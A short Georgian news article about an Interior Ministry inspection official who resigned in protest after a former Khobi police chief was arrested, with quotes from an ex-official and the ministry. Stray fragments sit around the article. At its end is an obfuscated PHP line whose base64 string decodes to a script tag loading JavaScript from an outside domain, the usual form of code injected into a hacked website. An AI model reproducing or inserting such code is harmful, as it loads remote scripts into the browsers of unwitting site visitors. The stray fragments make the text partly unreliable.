celsiusi
ავერსი შნაიდერი
შინაგან საქმეთა სამინისტროს გენერალური ინსპექციის დეპარტამენტის თანამშრომელმა ჭაბუკა რაფავამ თანამდებობა დატოვა. “მთავარი არხი” ყოფილ დეპუტატსა და შსს-ს მაღალჩინოსან თენგიზ გუნავაზე დაყრდნობით ავრცელებს ინფორმაციას, რომ რაფავამ თანამდებობაპროტესტის ნიშნად დატოვა ხობში მომხდარი ფაქტის გამო.
 
ხობში პოლიციის ყოფილი უფროსი ლექსო რაფავა დააკავეს. მისი ახლობლებისა და ენმ-ს ინფორმაციით, რაფავა ბოლო პერიოდში საარჩევნო პროცესებში იყო ჩაართული ოპოზიციის რიგებიდან და მას ამის გამო იარაღი და ხელყუმბარა ჩაუდეს.
 
“იგი გენერალურ ინსპექციაში ერთ-ერთი სამმართველოს უფროსის მოადგილის თანამდებობას იკავებდა. რაფავამ საკუთარი განცხადების საფუძველზე დატოვა თანამდებობა”, – განუცხადეს ნეტგაზეთს შსს-ში.
 
“არსებობს კიდევ რამდენიმე ადამიანი, რომელიც ფიქრობს, რომ დატოვოს სისტემა. ეს არის ხელისუფლების სინდისზე და მოვუწოდებ [პოლიციის] მუშაკებს, რომ ნუ შეასრულებენ პოლიტიკოსების ბინძურ დაკვეთას, – ამბობს თენგიზ გუნავა, მთარი არხის ცნობით.
 
ხობში მომხდარი ინციდენტის შემდეგ, თანამდებობიდან გადადგა რევაზ ლაზიშვილი, რომელიც სასაზღვრო პოლიციის თანამშრომელი იყო.
1070
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");